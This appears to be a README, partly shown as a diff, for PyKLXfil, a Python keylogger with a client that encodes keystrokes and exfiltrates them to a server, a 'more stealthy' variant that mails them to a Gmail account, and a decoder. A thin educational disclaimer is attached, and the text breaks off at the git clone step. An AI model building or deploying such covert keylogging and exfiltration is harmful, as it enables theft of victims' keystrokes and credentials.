iD4rksid3/PyKLXfil/README.md

 * PyKLXfil-Client: the agent that will perform the encoded key logging with a custome base64 table and the exfiltration of data back to PyKLXfil-Server.
 * PyKLXfil-Client-mail: a standalone agent that will perform encoded key logging with a custome base64 table and exfiltration to a gmail email account (more stealthy).
 * PyKLXfil-Decoder: a tool to decode the key logs.
+## Disclaimer: For educational purpose, use at your own responsibility.
 ## Install:
 ```sh
   git clone https://github.com/iD4rksid3/PyKLXfil.git